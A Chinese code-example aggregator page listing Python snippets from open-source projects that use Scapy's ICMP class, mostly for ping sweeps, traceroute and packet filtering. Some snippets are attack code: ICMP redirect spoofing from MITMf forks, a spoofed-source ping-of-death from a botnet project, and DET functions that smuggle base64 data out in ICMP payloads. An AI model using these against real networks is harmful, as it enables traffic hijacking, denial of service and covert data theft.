Python scapy.all 模块,ICMP 实例源码

我们从Python开源项目中,提取了以下31个代码示例,用于说明如何使用scapy.all.ICMP

项目:Python-Network-Programming-Cookbook-Second-Edition    作者:PacktPublishing    | 项目源码 | 文件源码
def detect_inactive_hosts(scan_hosts):
    """ 
    Scans the network to find scan_hosts are live or dead
    scan_hosts can be like 10.0.2.2-4 to cover range. 
    See Scapy docs for specifying targets.   
    """
    global scheduler
    scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
    inactive_hosts = []
    try:
        ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)
        ans.summary(lambda r : r.sprintf("%IP.src% is alive"))
        for inactive in unans:
            print ("%s is inactive" %inactive.dst)
            inactive_hosts.append(inactive.dst)

        print ("Total %d hosts are inactive" %(len(inactive_hosts)))


    except KeyboardInterrupt:
        exit(0)
项目:mitmfnz    作者:dropnz    | 项目源码 | 文件源码
def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt
项目:habu    作者:portantier    | 项目源码 | 文件源码
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    ans,unans=sr(IP(dst=ip, proto=(0,255))/"SCAPY",retry=0,timeout=2, verbose=True)

    for s,r in ans:
        print(r.summary())
        if not ICMP in r:
            r.show()
项目:piSociEty    作者:paranoidninja    | 项目源码 | 文件源码
def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt
项目:mitmf    作者:ParrotSec    | 项目源码 | 文件源码
def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt
项目:SEF    作者:ahmadnourallah    | 项目源码 | 文件源码
def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt
项目:DET    作者:sensepost    | 项目源码 | 文件源码
def listen():
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    # Filter for echo requests only to prevent capturing generated replies
    scapy.sniff(filter="icmp and icmp[0]=8", prn=analyze)
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def test_icmp(self):
        def process_response(echo_reply, dest):
            ans, unans = echo_reply
            if ans:
                log.msg("Received echo reply from %s: %s" % (dest, ans))
            else:
                log.msg("No reply was received from %s. Possible censorship event." % dest)
                log.debug("Unanswered packets: %s" % unans)
            self.report[dest] = echo_reply

        for label, data in self.destinations.items():
            reply = sr1(IP(dst=lebal) / ICMP())
            process = process_reponse(reply, label)

            #(ans, unans) = ping
            #self.destinations[self.dst].update({'ans': ans,
            #                                    'unans': unans,
            #                                    'response_packet': ping})
            #return ping

            #return reply
项目:stepler    作者:Mirantis    | 项目源码 | 文件源码
def get_last_ping_reply_ts(path):
    """Returns last ICMP echo response timestamp.

    If there are no replies in packets - it returns None.

    Args:
        packets (list): list packets

    Returns:
        float|None: last ICMP reply timestamp or None
    """
    last_replied_ts = None
    for packet in read_pcap(path, lfilter=filter_icmp):
        if not filter_icmp(packet):
            continue
        if packet[scapy.ICMP].type == TYPE_ICMP_REPLY:
            last_replied_ts = max(last_replied_ts, packet.time)
    return last_replied_ts
项目:SEF    作者:hossamhasanin    | 项目源码 | 文件源码
def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt
项目:011_python_network_programming_cookbook_demo    作者:jerry-0824    | 项目源码 | 文件源码
def detect_inactive_hosts(scan_hosts):
    """
    Scans the network to find scan_hosts are live or dead
    scan_hosts can be like 10.0.2.2-4 to cover range.
    See Scapy docs for spefifying targets.
    """

    global scheduler
    scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
    inactive_hosts = []
    try:
        ans, unans = sr(IP(dst = scan_hosts)/ICMP(), retry = 0, timeout = 1)
        ans.summary(lambda(s, r) : r.sprintf("%IP.src% is alive"))
        for inactive in unans:
            print "%s is inactive" %inactive.dst
            inactive_hosts.append(inactive.dst)

        print "Total %d hosts are inactive" %(len(inactive_hosts))
    except KeyboardInterrupt:
        exit(0)
项目:ddptr    作者:NullHypothesis    | 项目源码 | 文件源码
def asns_in_traceroute(traceroute, asndb):
    """
    Extract ASNs of hops in traceroute and return them as list.
    """

    asns = []

    for sent, recvd in traceroute:

        # Is the response an ICMP TTL Exceeded packet?

        if recvd.haslayer(scapy.ICMP) and recvd.payload.type == 11:
            asn, _ = asndb.lookup(recvd.src)
            if asn is not None:
                asns.append(asn)

    return asns
项目:MITMf    作者:wi-fi-analyzer    | 项目源码 | 文件源码
def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt
项目:pentesting-multitool    作者:ffmancera    | 项目源码 | 文件源码
def generator(self, n, filename):

        time = 0.00114108 * n + 0.157758
        minutes = time/60

        print('Generating packets, it will take %s seconds, moreless (%s, minutes)' % (time, minutes))

        pkgs = [IP(dst='10.0.0.1')/ICMP() for i in range(n)]
        wrpcap(filename, pkgs)

        print('%s packets generated.' % (n))
项目:ActualBotNet    作者:invasi0nZ    | 项目源码 | 文件源码
def ping_of_death(self, target):
        from scapy.all import IP, ICMP, send
        src = "%i.%i.%i.%i" % (
        random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        ip_hdr = IP(src, target)
        _packet = ip_hdr / ICMP() / (str(os.urandom(65500)))
        send(_packet)
项目:ActualBotNet    作者:invasi0nZ    | 项目源码 | 文件源码
def get_gateway(self):
        p = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0)
        return p.src
项目:SwarmRobotics    作者:superit23    | 项目源码 | 文件源码
def heartbeat_call(self, event):
    # Send a packet to every WiFiTrilat server.
    for host in [s[1:s.find('/WiFi')] for s in self.client.discover()]:
      #sr(IP(dst=host)/ICMP(), iface=self.interface)
      cli.execute(command='ping -c 4 %s' % host, wait=False, shellexec=True)
项目:DET    作者:sensepost    | 项目源码 | 文件源码
def send(data):
    data = base64.b64encode(data)
    app_exfiltrate.log_message(
        'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data)))
    scapy.sendp(scapy.Ether() /
                scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
项目:DET    作者:sensepost    | 项目源码 | 文件源码
def analyze(packet):
    src = packet.payload.src
    dst = packet.payload.dst
    try:
        app_exfiltrate.log_message(
            'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
        app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
    except:
        pass
项目:smart_sniffer    作者:ScarWar    | 项目源码 | 文件源码
def make_stamp(pkt):
    if s.IP in pkt:
        ip_send = pkt[s.IP].src
        ip_rec = pkt[s.IP].dst
    else:
        return None

    if s.TCP in pkt:
        # port_send = pkt[TCP].sport
        # port_rec = pkt[TCP].dport
        protocol = "TCP"

    elif s.UDP in pkt:
        # port_send = pkt[UDP].sport
        # port_rec = pkt[UDP].dport
        protocol = "UDP"

    elif s.ICMP in pkt:
        # port_send = 1  # pkt[ICMP].sport
        # port_rec = 1  # pkt[ICMP].dport
        protocol = "ICMP"

    else:
        return None  # if not TCP or UDP or ICMP

    return ip_send, ip_rec, protocol
项目:netmon    作者:bullerian    | 项目源码 | 文件源码
def ping_host(self, ip):
        """method to send ICMP/ARP requests and receive response
        from the host with @ip address.
        Returns a tuple (ip/host name, ONLINE/OFFLINE, response time)"""

        # form an ICMP or ARP packet
        packet = self.__gen_packet(ip)

        try:
            # send and wait for response
            answers, unanswers = self.__send_recv(packet)
        except PermissionError:
            raise PermissionException

        if self.__resolve_names:
            # resolve host name by ip if resolve_names
            # flag was set
            try:
                host = gethostbyaddr(ip)[HOST_NAME_INDEX]
            except herror:
                host = ip
        else:
            # otherwise show ip
            host = ip

        if answers:
            answer = answers[FIRST_INDEX]
            # get the request object
            req = answer[REQUEST_INDEX]
            # get the response object
            resp = answer[RESPONSE_INDEX]
            # calculate response time and round it
            delta = resp.time - req.sent_time
            return host, ONLINE, delta
        else:
            # return unansered results
            unanswer = unanswers[FIRST_INDEX]
            resp = unanswer[RESPONSE_INDEX]
            return host, OFFLINE, None
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def test_icmp_ping(self):
        def finished(packets):
            print packets
            answered, unanswered = packets
            for snd, rcv in answered:
                rcv.show()

        packets = IP(dst=self.localOptions['target'])/ICMP()
        d = self.sr(packets)
        d.addCallback(finished)
        return d
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def test_icmp_ping(self):
        packets = IP(dst=self.localOptions['target'])/ICMP()
        answered, unanswered = yield self.sr(packets)
        for snd, rcv in answered:
            rcv.show()
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def ICMPTraceroute(self, host):
        if host not in self.hosts:
            self.hosts.append(host)

        d = defer.Deferred()
        reactor.callLater(self.timeout, d.callback, self)

        self.sendPackets(IP(dst=host, ttl=(self.ttl_min, self.ttl_max), id=RandShort()) / ICMP(id=RandShort()))
        return d
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def packetReceived(self, packet):
        l = packet.getlayer(1)
        if not l:
            return
        elif isinstance(l, ICMP) or isinstance(l, UDP) or isinstance(l, TCP):
            self._recvbuf.append(packet)
项目:stepler    作者:Mirantis    | 项目源码 | 文件源码
def filter_icmp(packet):
    """Returns True if packet contains ICMP layer."""
    return scapy.ICMP in packet
项目:DET    作者:Exploit-install    | 项目源码 | 文件源码
def send(data):
    data = base64.b64encode(app_exfiltrate.xor(data))
    app_exfiltrate.log_message(
        'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data)))
    scapy.sendp(scapy.Ether() /
                scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
项目:DET    作者:Exploit-install    | 项目源码 | 文件源码
def listen():
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    scapy.sniff(filter="icmp", prn=analyze)
项目:DET    作者:Exploit-install    | 项目源码 | 文件源码
def analyze(packet):
    src = packet.payload.src
    dst = packet.payload.dst
    try:
        app_exfiltrate.log_message(
            'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
        app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
    except:
        pass
项目:habu    作者:portantier    | 项目源码 | 文件源码
def cmd_ping(ip, count, timeout, wait, verbose):

    conf.verb = False

    layer3 = IP()
    layer3.dst = ip
    layer3.tos = 0
    layer3.id = 1
    layer3.flags = 0
    layer3.frag = 0
    layer3.ttl = 64
    layer3.proto = 1 # icmp

    layer4 = ICMP()
    layer4.type = 8 # echo-request
    layer4.code = 0
    layer4.id = 0
    layer4.seq = 0

    pkt = layer3 / layer4

    counter = 0

    while True:
        ans = sr1(pkt, timeout=timeout)
        if ans:
            if verbose:
                ans.show()
            else:
                print(ans.summary())
            del(ans)
        else:
            print('Timeout')

        counter += 1

        if count != 0 and counter == count:
            break

        sleep(wait)

    return True
项目:habu    作者:portantier    | 项目源码 | 文件源码
def cmd_icmp(ip, verbose):

    conf.verb = False

    #pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port)
    pkt = IP(dst=ip) / ICMP()# , proto=(0, 255)) # / TCP(flags=(0, 255), dport=port)


    messages = [
        (8, 0),  # echo request
        (13, 0), # timestamp
        (15, 0), # info request
        #(), #
        #(), #
    ]

    #print(pkts.summary())
    #print(pkts.show2())

    #print(icmpcodes)

    for itype, icode in messages:
        pkt[ICMP].type = itype
        pkt[ICMP].code = icode
        ans = sr1(pkt, timeout=0.2)
        if ans:
            print(ans.show())
    #    for icode in range(0, 256):
    #        print(itype, icode)
        else:
            print("NOT ANSWER!!!")

    out = "{:>8} -> {:<8}"



    '''
    for pkt in pkts:
        #if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags):
        print(pkt.show2())
        ans = sr1(pkt, timeout=0.2)
        if ans:
            #if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags):
            #print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%")))
            print(ans.show())
    '''

    return True